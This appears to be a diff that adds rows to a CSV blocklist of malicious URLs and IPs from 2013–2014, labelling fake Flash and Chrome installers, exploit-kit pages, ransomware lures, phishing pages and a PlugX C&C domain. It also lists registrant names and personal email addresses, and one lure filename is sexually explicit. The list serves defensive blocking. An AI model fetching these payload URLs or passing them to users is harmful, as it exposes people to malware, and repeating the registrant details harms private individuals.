+"2013/05/12_14:55","-","180.235.132.29:8080//get/e3943d7369aa6add911aca18b3a507f4.exe","-","Trojan.FakeAlert","-","55639","0","HK", +"2013/05/12_14:55","-","208.88.5.229:8080//get/e3943d7369aa6add911aca18b3a507f4.exe","d05805e4.powerprojct.ca.","Trojan.FakeAlert","-","36218","0","CA", +"2013/05/12_14:55","-","217.8.253.250:8080//get/e3943d7369aa6add911aca18b3a507f4.exe","mail.trcontents.co.uk.","Trojan.FakeAlert","-","20738","0","GB", +"2013/05/12_14:55","-","5.135.115.100:8080//get/e3943d7369aa6add911aca18b3a507f4.exe","-","Trojan.FakeAlert","-","16276","0","FR", +"2013/05/12_14:55","-","5.135.115.193:8080//get/e3943d7369aa6add911aca18b3a507f4.exe","serv2-am.com.","Trojan.FakeAlert","-","16276","0","FR", +"2013/05/12_14:55","-","5.135.115.194:8080//get/e3943d7369aa6add911aca18b3a507f4.exe","serv1-am-mta.com.","Trojan.FakeAlert","-","16276","0","FR", +"2013/05/12_14:55","-","5.135.115.195:8080//get/e3943d7369aa6add911aca18b3a507f4.exe","mta1.serv1-am-mta.com.","Trojan.FakeAlert","-","16276","0","FR", +"2013/05/12_14:55","-","5.135.115.196:8080//get/e3943d7369aa6add911aca18b3a507f4.exe","mta2.serv1-am-mta.com.","Trojan.FakeAlert","-","16276","0","FR", +"2013/05/12_14:55","-","5.135.115.197:8080//get/e3943d7369aa6add911aca18b3a507f4.exe","mta3.serv1-am-mta.com.","Trojan.FakeAlert","-","16276","0","FR", +"2013/05/12_14:55","-","5.135.115.198:8080//get/e3943d7369aa6add911aca18b3a507f4.exe","mta4.serv1-am-mta.com.","Trojan.FakeAlert","-","16276","0","FR", +"2013/05/12_14:55","-","5.135.115.199:8080//get/e3943d7369aa6add911aca18b3a507f4.exe","mta5.serv1-am-mta.com.","Trojan.FakeAlert","-","16276","0","FR", +"2013/05/12_14:55","-","5.135.115.201:8080//get/e3943d7369aa6add911aca18b3a507f4.exe","mta7.serv1-am-mta.com.","Trojan.FakeAlert","-","16276","0","FR", +"2013/05/12_14:55","-","5.135.115.202:8080//get/e3943d7369aa6add911aca18b3a507f4.exe","mta8.serv1-am-mta.com.","Trojan.FakeAlert","-","16276","0","FR", 
+"2013/05/12_14:55","-","5.135.115.203:8080//get/e3943d7369aa6add911aca18b3a507f4.exe","mta9.serv1-am-mta.com.","Trojan.FakeAlert","-","16276","0","FR", +"2013/05/12_14:55","-","5.135.115.204:8080//get/e3943d7369aa6add911aca18b3a507f4.exe","mta10.serv1-am-mta.com.","Trojan.FakeAlert","-","16276","0","FR", +"2013/05/12_14:55","-","5.135.115.205:8080//get/e3943d7369aa6add911aca18b3a507f4.exe","mta11.serv1-am-mta.com.","Trojan.FakeAlert","-","16276","0","FR", +"2013/05/12_14:55","-","5.135.115.206:8080//get/e3943d7369aa6add911aca18b3a507f4.exe","mta12.serv1-am-mta.com.","Trojan.FakeAlert","-","16276","0","FR", +"2013/05/12_14:55","-","5.135.115.207:8080//get/e3943d7369aa6add911aca18b3a507f4.exe","mta13.serv1-am-mta.com.","Trojan.FakeAlert","-","16276","0","FR", +"2013/05/12_14:55","-","5.135.115.208:8080//get/e3943d7369aa6add911aca18b3a507f4.exe","mta14.serv1-am-mta.com.","Trojan.FakeAlert","-","16276","0","FR", +"2013/05/12_14:55","-","5.135.115.209:8080//get/e3943d7369aa6add911aca18b3a507f4.exe","mta15.serv1-am-mta.com.","Trojan.FakeAlert","-","16276","0","FR", +"2013/05/12_14:55","-","5.135.115.210:8080//get/e3943d7369aa6add911aca18b3a507f4.exe","mta16.serv1-am-mta.com.","Trojan.FakeAlert","-","16276","0","FR", +"2013/05/12_14:55","-","5.135.115.211:8080//get/e3943d7369aa6add911aca18b3a507f4.exe","mta17.serv1-am-mta.com.","Trojan.FakeAlert","-","16276","0","FR", +"2013/05/12_14:55","-","5.135.115.212:8080//get/e3943d7369aa6add911aca18b3a507f4.exe","mta18.serv1-am-mta.com.","Trojan.FakeAlert","-","16276","0","FR", +"2013/05/12_14:55","-","5.135.115.213:8080//get/e3943d7369aa6add911aca18b3a507f4.exe","mta19.serv1-am-mta.com.","Trojan.FakeAlert","-","16276","0","FR", +"2013/05/12_14:55","-","5.135.115.214:8080//get/e3943d7369aa6add911aca18b3a507f4.exe","mta20.serv1-am-mta.com.","Trojan.FakeAlert","-","16276","0","FR", 
+"2013/05/12_14:55","-","5.135.115.215:8080//get/e3943d7369aa6add911aca18b3a507f4.exe","mta21.serv1-am-mta.com.","Trojan.FakeAlert","-","16276","0","FR", +"2013/05/12_14:55","-","5.135.115.216:8080//get/e3943d7369aa6add911aca18b3a507f4.exe","mta22.serv1-am-mta.com.","Trojan.FakeAlert","-","16276","0","FR", +"2013/05/12_14:55","-","5.135.115.217:8080//get/e3943d7369aa6add911aca18b3a507f4.exe","mta23.serv1-am-mta.com.","Trojan.FakeAlert","-","16276","0","FR", +"2013/05/12_14:55","-","5.135.115.218:8080//get/e3943d7369aa6add911aca18b3a507f4.exe","mta24.serv1-am-mta.com.","Trojan.FakeAlert","-","16276","0","FR", +"2013/05/12_14:55","-","5.135.115.219:8080//get/e3943d7369aa6add911aca18b3a507f4.exe","mta25.serv1-am-mta.com.","Trojan.FakeAlert","-","16276","0","FR", +"2013/05/12_14:55","-","5.135.115.220:8080//get/e3943d7369aa6add911aca18b3a507f4.exe","mta26.serv1-am-mta.com.","Trojan.FakeAlert","-","16276","0","FR", +"2013/05/12_14:55","-","5.135.115.221:8080//get/e3943d7369aa6add911aca18b3a507f4.exe","mta27.serv1-am-mta.com.","Trojan.FakeAlert","-","16276","0","FR", +"2013/05/12_14:55","-","5.135.115.222:8080//get/e3943d7369aa6add911aca18b3a507f4.exe","mta28.serv1-am-mta.com.","Trojan.FakeAlert","-","16276","0","FR", +"2013/05/12_14:55","-","66.175.218.117:8080//get/e3943d7369aa6add911aca18b3a507f4.exe","li513-117.members.linode.com.","Trojan.FakeAlert","-","6939","0","US", +"2013/05/12_14:55","-","78.110.162.72:8080//get/e3943d7369aa6add911aca18b3a507f4.exe","78-110-162-72.rdns.ldni.net.","Trojan.FakeAlert","-","42831","0","GB", +"2013/05/12_14:55","-","78.110.162.73:8080//get/e3943d7369aa6add911aca18b3a507f4.exe","78-110-162-73.rdns.ldni.net.","Trojan.FakeAlert","-","42831","0","GB", +"2013/05/12_14:55","-","78.110.162.79:8080//get/e3943d7369aa6add911aca18b3a507f4.exe","78-110-162-79.rdns.ldni.net.","Trojan.FakeAlert","-","42831","0","GB", 
+"2013/05/12_14:55","-","85.214.133.237:8080//get/e3943d7369aa6add911aca18b3a507f4.exe","gamelevel.de.","Trojan.FakeAlert","-","6724","0","DE", +"2013/05/12_14:55","-","94.23.38.214:8080//get/e3943d7369aa6add911aca18b3a507f4.exe","ns368891.ovh.net.","Trojan.FakeAlert","-","16276","0","FR", +"2013/05/20_18:00","yougube.com","199.223.209.169","server.ambertechnic.com.","Redirects to Rogue.FakeFlashPlayer","Email:k8atacs4f84bd7a8c158@t02cduv4f7f99a255f64.privatewhois.net","25847","0","US", +"2013/05/20_18:00","youtuhe.com","174.140.17.100","-","Redirects to Rogue.FakeFlashPlayer","15520009924361-f52e2a@whoisprivacyservices.com.au","32311","0","US", +"2014/03/11_22:39","ukonline.hc0.me/Host.exe","5.135.127.68","-","DR/AutoIt.Gen2","WhoisGuard Protected / 630ca54ebc794d67bd94109ac2190e52.protect@whoisguard.com","16276","0","FR", +"2013/05/20_20:35","youtibe.com","173.193.106.10","173.193.106.10-static.reverse.softlayer.com.","Redirects to Rogue.FakeFlashPlayer","Domain Admin (contact@privacyprotect.org","36351","0","US", +"2014/03/11_22:39","ukonline.hc0.me/new.exe","5.135.127.68","-","DR/AutoIt.Gen2","WhoisGuard Protected / 630ca54ebc794d67bd94109ac2190e52.protect@whoisguard.com","16276","0","FR", +"2013/06/03_19:38","-","143.95.1.6/31b9326e5a618c53/a.php","ip-143-95-1-6.iplocal.","exploit kit","-","36444","0","US", +"2013/06/05_20:17","www.tdms.saglik.gov.tr/KDV_Guncel_Tevkifat_Oranlari.htm","212.175.169.227","-","compromised sites leads to exploit kit","Salk Bakanl / netsistem@saglik.gov.tr","9121","0","TR", +"2013/06/17_11:56","sunny99.cholerik.cz/plugins/3yvPRqFJ.php","77.93.211.244","f.banan.cz.","redirects to exploit kit","Martin Toman / tomanmartiny@seznam.cz","24971","0","CZ", +"2013/06/20_11:20","www.rooversadvocatuur.nl/rel.php","83.172.140.27","ns1.securenameserver5.net.","redirects to exploit kit","-","25459","0","NL", +"2013/06/20_14:31","-","212.124.116.129:8080/7167888324/3503.zip","-","Java exploit","-","47328","0","RU", 
+"2013/06/20_14:31","-","212.124.116.129:8080/7167888324/1.zip","-","Java exploit","-","47328","0","RU", +"2013/06/21_10:17","-","212.124.116.141:8080/7167888324/2.zip","-","Java exploit","-","47328","0","RU", +"2013/06/21_10:17","-","212.124.116.141:8080/7167888324/7521.zip","-","Java exploit","-","47328","0","RU", +"2013/07/11_02:06","malest.com","208.115.233.154","154-233-115-208.static.reverse.lstn.net.","Leads to fake Google Chrome","shihengzhong@web.de","46475","0","US", +"2013/07/11_02:06","dl01.faddmr.com/n/e176d94e-d9b7-11e2-a752-00259033c1da/Setup.exe?tid=102dccc4aa5799d2efb748b9dd0e4fFake","50.17.189.198","ec2-50-17-189-198.compute-1.amazonaws.com.","Google Chrome","Domains By Proxy, LLC / -","14618","0","US", +"2013/07/11_02:06","dl01.faddmr.com/n/3.0.15.1/9041377/Setup.exe?tid=102dccc4aa5799d2efb748b9dd0e4f","50.17.189.198","ec2-50-17-189-198.compute-1.amazonaws.com.","Fake Google Chrome","Domains By Proxy, LLC / -","14618","0","US", +"2013/07/11_07:25","www.rebeccacella.com/wp-content/plugins/subscribe/","212.227.31.159","kundenserver.de.","compromised site leads to exploit kit","rebeccacella@hotmail.com","8560","0","DE", +"2013/07/11_12:54","www.lowes-pianos-and-organs.com/images/d521c2a038/?zAXbu4Wah12XtNHf0YTNwgTNwIjM0ATMzIDfvgzMwEmMjFjM1Q2LzV2Zh1Wav02bj5","67.222.109.112","d15.altserver.com.","ycuF2Zy9WLk5WYtM3buFWaw1ycld3bs5yd3d3LvoDc0RHa8NnZ exploit kit","Registrant admin@titaninternet.com.au","33494","0","US", +"2013/07/11_16:54","lcbcad.co.uk/4541b36fdd41b9610c2e870b21fc5022/q.php","78.129.250.40","server.brainstormdevelopment.co.uk.","exploit kit","Leeds College of Building / -","20860","0","GB", +"2013/07/22_11:48","v.inigsplan.ru/lich/inc/v7675/?/","90.156.212.70","v7675.vps.masterhost.ru.","redirects to Postbank phishing","-","25532","0","RU", +"2013/07/22_11:48","mailboto.com/landing/themes/bluemarine/corso/index.htm","64.235.52.182","mailboto.com.","Postbank phishing","Domains By Proxy, LLC / -","26277","0","US", 
+"2013/07/23_16:30","guyscards.com/adobe/","184.95.37.100","-","Fake.FlashPlayer.Trojan","Guy Sanford / -","20454","0","US", +"2013/07/23_16:30","guyscards.com/adobe/update_flash_player.exe","184.95.37.100","-","Trojan","Guy Sanford / -","20454","0","US", +"2013/07/25_06:19","teameda.comcastbiz.net/expanding/index.html","216.87.186.173","-","leads to exploit kit","Corporation Service Company / e28eefcc1cdd5b95c3b663@reg.csccorporatedomains.com","30217","0","US", +"2013/07/25_06:19","wc0x83ghk.homepage.t-online.de/communed/ameba.js","80.150.6.138","b2c.t-online.de.","redirects to exploit kit","hostmaster@t-online.net","3320","0","DE", +"2014/03/20_18:19","instruminahui.edu.ec/201403/editor.html","74.207.242.230","host.saaslibre.info.","exploit kit","geovanni simbaña / sgeovani75@hotmail.com","6939","0","US", +"2013/07/25_06:31","server1.extra-web.cz/dbm.exe","212.80.69.55","xhosting.cz.","trojan","tefan Ihnat / stefan.ihnat@email.cz","29208","0","CZ", +"2013/08/02_13:16","nutnet.ir/dl/nnnew.txt","64.79.83.14","-","Leads to exploit","Seyed Alireza Miri Lavasani / SAML_ROMMEL@YAHOO.COM","10297","0","US", +"2013/08/04_04:46","-","188.190.125.173/xUmEqHqYxi/uxrpdvcjbk.php?rehnreh=sjXovBJv&kjrthdrgs=13788997&rjthergsf=893","-","Exploit","-","197145","0","UA", +"2013/08/07_19:06","eliehabib.com/topic/regard_alternate_sheet.php","173.246.105.15","-","Exploit","-","29169","0","US", +"2013/08/07_18:57","kipasdenim.com/images/wp-sts.php","94.73.146.50","94-73-146-50.cizgi.net.tr.","Leads to exploit","mehmet kutlu / mkinanc@gmail.com","34619","0","TR", +"2013/08/07_18:57","praxisww.com/wp-stc.php","69.26.171.30","webprecision.com.","Leads to exploit","Praxis Communications / eric@praxisww.com","27524","0","US", +"2013/08/07_18:57","romvarimarton.hu/wp-stc.php","195.56.150.12","mail.kepstudio.hu.","Leads to exploit","-","3340","0","HU", +"2013/08/07_18:57","saemark.is/wp-content/plugins/wp-sts.php","212.30.229.50","-","Leads to exploit","Sæmark-Sjávarafurðir ehf / 
siggi@saemark.is","44515","0","IS", +"2013/08/07_18:57","vitamasaz.pl/wp-stc.php","188.116.35.5","n22.netmark.pl.","Leads to exploit","domeny@ConsultingService.pl","43333","0","PL", +"2013/08/07_18:57","www.coloritpak.by/wp-stc.php","93.125.99.11","vh41.hosterby.com.","Leads to exploit","-","6697","0","BY", +"2013/08/07_18:57","www.fasadobygg.com/wp-stc.php","78.110.82.72","host-78-110-82-72.n62.se.","Leads to exploit","contact@privacyprotect.org","31507","0","SE", +"2013/08/07_18:57","www.hausnet.ru/wp-stc.php","188.191.224.17","ks17.hausnet.ru.","Leads to exploit","-","197624","0","RU", +"2013/08/07_18:57","www.joomlalivechat.com/wp-stc.php","174.129.234.86","ec2-174-129-234-86.compute-1.amazonaws.com.","Leads to exploit","-","14618","0","US", +"2013/08/07_18:57","www.litra.com.mk/wp-sts.php","98.130.102.2","rev.opentransfer.com.2.102.130.98.in-addr.arpa.","Leads to exploit","-","32392","0","US", +"2013/08/07_18:57","www.over50datingservices.com/wp-stc.php","79.170.44.116","web116.extendcp.co.uk.","Leads to exploit","Administrative brian@kaneconsult.co.uk","31727","0","GB", +"2013/08/07_18:57","www.praxisww.com/wp-stc.php","69.26.171.30","webprecision.com.","Leads to exploit","Praxis Communications / eric@praxisww.com","27524","0","US", +"2013/08/07_18:57","www.saemark.is/wp-content/plugins/wp-sts.php","212.30.229.50","-","Leads to exploit","Sæmark-Sjávarafurðir ehf / siggi@saemark.is","44515","0","IS", +"2013/08/07_18:57","www.wyroki.eu/wp-stc.php","85.128.187.109","ame109.rev.netart.pl.","Leads to exploit","NOT DISCLOSED! 
/ admin@netart.pl","15967","0","PL", +"2013/08/12_07:18","manoske.com/main.php?label=TJaxqKIV0+wlz0MJN5SxypUhWaVDQDqE4PwfdxjPls0=","184.173.230.95","184.173.230.95-static.reverse.softlayer.com.","trojan inside zip file","-","36351","0","US", +"2013/08/23_11:55","-","174.142.240.91/577ac477f62d4873cf41dc834d107b7c/influences-portal.php","-","exploit kit","-","32613","0","CA", +"2013/09/12_05:43","mmile.com/images/rhcs05.exe","206.72.201.52","mmile.com.","Trojan.Zbot","Registrar Abuse Contact abuse@1and1.com","19318","0","--", +"2013/08/23_16:54","highflyingfood.com/images/vids/adobe_flash.exe","81.27.105.160","160-105-27-81.inetc.net.","Trojan.Ransom","Brash Solutions Ltd / brash@ukgateway.net","24851","0","GB", +"2013/08/23_16:54","highflyingfood.com/images/vids/","81.27.105.160","160-105-27-81.inetc.net.","Exploit","Brash Solutions Ltd / brash@ukgateway.net","24851","0","GB", +"2013/08/23_16:54","highflyingfood.com/images/vids/qp.php?out","81.27.105.160","160-105-27-81.inetc.net.","Exploit","Brash Solutions Ltd / brash@ukgateway.net","24851","0","GB", +"2013/08/23_16:54","highflyingfood.com/images/vids/archives/porno1.zip","81.27.105.160","160-105-27-81.inetc.net.","Trojan.Ransom","Brash Solutions Ltd / brash@ukgateway.net","24851","0","GB", +"2013/08/23_16:54","highflyingfood.com/images/vids/archives/porno2.zip","81.27.105.160","160-105-27-81.inetc.net.","Trojan.Ransom","Brash Solutions Ltd / brash@ukgateway.net","24851","0","GB", +"2013/08/23_16:54","highflyingfood.com/images/vids/archives/porno3.zip","81.27.105.160","160-105-27-81.inetc.net.","Trojan.Ransom","Brash Solutions Ltd / brash@ukgateway.net","24851","0","GB", +"2013/08/23_16:54","highflyingfood.com/images/vids/archives/porno4.zip","81.27.105.160","160-105-27-81.inetc.net.","Trojan.Ransom","Brash Solutions Ltd / brash@ukgateway.net","24851","0","GB", +"2013/08/23_16:54","highflyingfood.com/images/vids/archives/porno5.zip","81.27.105.160","160-105-27-81.inetc.net.","Trojan.Ransom","Brash Solutions Ltd / 
brash@ukgateway.net","24851","0","GB", +"2013/08/23_16:54","highflyingfood.com/images/vids/archives/porno6.zip","81.27.105.160","160-105-27-81.inetc.net.","Trojan.Ransom","Brash Solutions Ltd / brash@ukgateway.net","24851","0","GB", +"2013/08/27_07:50","-","62.76.189.216","62-76-189-216.clodo.ru.","Leads to ransomware","-","57010","0","RU", +"2013/08/27_07:50","-","62.76.189.216/firefox/firefox.html","62-76-189-216.clodo.ru.","Leads to ransomware","-","57010","0","RU", +"2013/08/27_07:50","-","62.76.189.216/chrome/chrome.html","62-76-189-216.clodo.ru.","Leads to ransomware","-","57010","0","RU", +"2013/08/27_07:50","-","62.76.189.216/ie/ie.html","62-76-189-216.clodo.ru.","Leads to ransomware","-","57010","0","RU", +"2013/08/27_07:50","-","62.76.189.216/chrome/ChromeUpdate.exe","62-76-189-216.clodo.ru.","Trojan.FakePutt","-","57010","0","RU", +"2013/08/27_07:50","-","62.76.189.216/firefox/FirefoxUpdate.exe","62-76-189-216.clodo.ru.","Trojan.FakePutt","-","57010","0","RU", +"2013/08/27_07:50","-","62.76.189.216/ie/IEUpdate.exe","62-76-189-216.clodo.ru.","Trojan.FakePutt","-","57010","0","RU", +"2013/08/30_07:38","windspotter.net/?r=site/widget","178.63.73.213","static.213.73.63.178.clients.your-server.de.","compromised site leads to Java exploit","-","24940","0","DE", +"2013/08/30_10:31","-","64.151.226.150/7aa1c07e79cac0a6beeccff5c987b36f/websites-reproductive.php","-","exploit kit","-","26753","0","CA", +"2013/09/06_04:59","luggage-tv.com/adobe/update_flash_player.exe","174.140.171.207","-","Trojan.FareIT","-","46816","0","US", +"2013/09/06_04:59","luggagepreview.com/adobe/update_flash_player.exe","174.140.171.207","-","Trojan.FareIT","-","46816","0","US", +"2013/09/06_04:59","luggagecast.com/adobe/update_flash_player.exe","174.140.171.207","-","Trojan.FareIT","-","46816","0","US", +"2013/09/06_04:59","-","174.140.171.207/adobe/update_flash_player.exe","-","Trojan.FareIT","-","46816","0","US", 
+"2013/09/06_04:59","kapcotool.com/adobe/update_flash_player.exe","74.207.227.154","li69-154.members.linode.com.","Trojan.FareIT","-","3595","0","US", +"2013/09/06_04:59","kapcotool.com/topic/able_disturb_planning.php","74.207.227.154","li69-154.members.linode.com.","Exploit","-","3595","0","US", +"2013/09/06_04:59","luggage-tv.com//topic/able_disturb_planning.php","174.140.171.207","-","Exploit","-","46816","0","US", +"2013/09/06_04:59","luggagepreview.com//topic/able_disturb_planning.php","174.140.171.207","-","Exploit","-","46816","0","US", +"2013/09/06_04:59","by98.com/reincarnate/index.html","210.152.132.10","10.0/25.132.152.210.in-addr.arpa.","Leads to exploit","For more information, please contact hostmaster@gmo.jp.","4694","0","JP", +"2016/09/14_20:05","ad.getfond.info","83.217.26.203","ru2.com.","PlugX C&C","jack tom / tom19822018@outlook.com","200161","0","RU", +"2013/09/06_04:59","-","202.212.131.8/ruses/nonsmokers.js","www.melodian.co.jp.","Leads to exploit","-","2514","0","JP", +"2013/09/06_04:59","-","207.188.69.171/colosseum/robed.js","207.188.69.171.tor.pathcom.com.","Leads to exploit","-","11342","0","CA", +"2013/09/06_04:59","dcanscapital.co.uk/panhandled/scientists.js","212.1.212.89","-","Leads to exploit","Isaac Osei / -","47583","0","US", +"2013/09/06_04:59","japanesevehicles.us/vector/internees.js","50.87.72.219","50-87-72-219.unifiedlayer.com.","Leads to exploit","Muhammad Azeem Choudhry / alimedic@cyber.net.pk","46606","0","US", +"2013/09/06_04:59","teameda.net/tipsier/stuttgart.js","216.87.186.173","-","Leads to exploit","Michael Mclain / mike@teameda.comcastbiz.net","30217","0","US", +"2013/09/06_04:59","luggagecast.com/topic/able_disturb_planning.php","174.140.171.207","-","Exploit","-","46816","0","US", +"2013/09/06_04:59","-","174.140.171.207/topic/able_disturb_planning.php","-","Exploit","-","46816","0","US", +"2013/09/12_05:43","mmile.com/images/bl.exe","206.72.201.52","mmile.com.","Trojan.Inject","Registrar Abuse Contact 
abuse@1and1.com","19318","0","--", +"2013/09/12_05:43","www.moviedownloader.net/d/GraboidMovieDownloader-3.54.exe","64.20.45.228","-","Adware.Fusenet","-","19318","0","--", +"2013/09/12_05:48","bluecutsystem.com/load3.exe","173.254.28.141","just141.justhost.com.","Trojan.Zbot","Saeed Azadipour / asmai55@gmail.com","46606","0","--", +"2013/09/12_05:48","-","103.31.186.29/2013/girl-fucked-by-dog.avi.exe","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","tube8vidsvrx.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","tube8vidsvtp.dnset.com/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","Network Operations, ChangeIP / noc@changeip.com","39743","0","--", +"2013/09/12_05:48","tube8vidswsy.dnset.com/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","Network Operations, ChangeIP / noc@changeip.com","39743","0","--", +"2013/09/12_05:48","tube8vidswtb.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","tube8vidswys.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","tube8vidsxlo.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","tube8vidsxmx.dnset.com/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","Network Operations, ChangeIP / noc@changeip.com","39743","0","--", +"2013/09/12_05:48","tube8vidsxpg.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","tube8vidsxpp.dnset.com/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","Network Operations, 
ChangeIP / noc@changeip.com","39743","0","--", +"2013/09/12_05:48","tube8vidsxwu.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","tube8vidsycs.dnset.com/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","Network Operations, ChangeIP / noc@changeip.com","39743","0","--", +"2013/09/12_05:48","tube8vidsyip.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","tube8vidsymz.dnset.com/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","Network Operations, ChangeIP / noc@changeip.com","39743","0","--", +"2013/09/12_05:48","tube8vidsyre.dnset.com/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","Network Operations, ChangeIP / noc@changeip.com","39743","0","--", +"2013/09/12_05:48","tube8vidsyyf.dnset.com/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","Network Operations, ChangeIP / noc@changeip.com","39743","0","--", +"2013/09/12_05:48","tube8vidszmi.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","tube8vidsznj.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","tube8vidsznx.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","tube8vidscqs.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","tube8vidscut.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", 
+"2013/09/12_05:48","tube8vidsdob.dnset.com/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","Network Operations, ChangeIP / noc@changeip.com","39743","0","--", +"2013/09/12_05:48","tube8vidsdst.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","tube8vidsfgd.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","tube8vidshhr.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","tube8vidshkk.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","tube8vidshrw.dnset.com/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","Network Operations, ChangeIP / noc@changeip.com","39743","0","--", +"2013/09/12_05:48","tube8vidsiet.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","tube8vidsiww.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","tube8vidsjac.dnset.com/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","Network Operations, ChangeIP / noc@changeip.com","39743","0","--", +"2013/09/12_05:48","tube8vidsjan.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","tube8vidsjhn.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","tube8vidsjtq.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", 
+"2013/09/12_05:48","tube8vidslmf.dnset.com/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","Network Operations, ChangeIP / noc@changeip.com","39743","0","--", +"2013/09/12_05:48","tube8vidslni.dnset.com/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","Network Operations, ChangeIP / noc@changeip.com","39743","0","--", +"2013/09/12_05:48","tube8vidslqk.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","tube8vidslrz.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","tube8vidsnlq.dnset.com/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","Network Operations, ChangeIP / noc@changeip.com","39743","0","--", +"2013/09/12_05:48","tube8vidsnrt.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","tube8vidsnvd.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","tube8vidsnyp.dnset.com/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","Network Operations, ChangeIP / noc@changeip.com","39743","0","--", +"2013/09/12_05:48","tube8vidsolh.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","tube8vidsotz.dnset.com/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","Network Operations, ChangeIP / noc@changeip.com","39743","0","--", +"2013/09/12_05:48","tube8vidsowd.dnset.com/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","Network Operations, ChangeIP / noc@changeip.com","39743","0","--", 
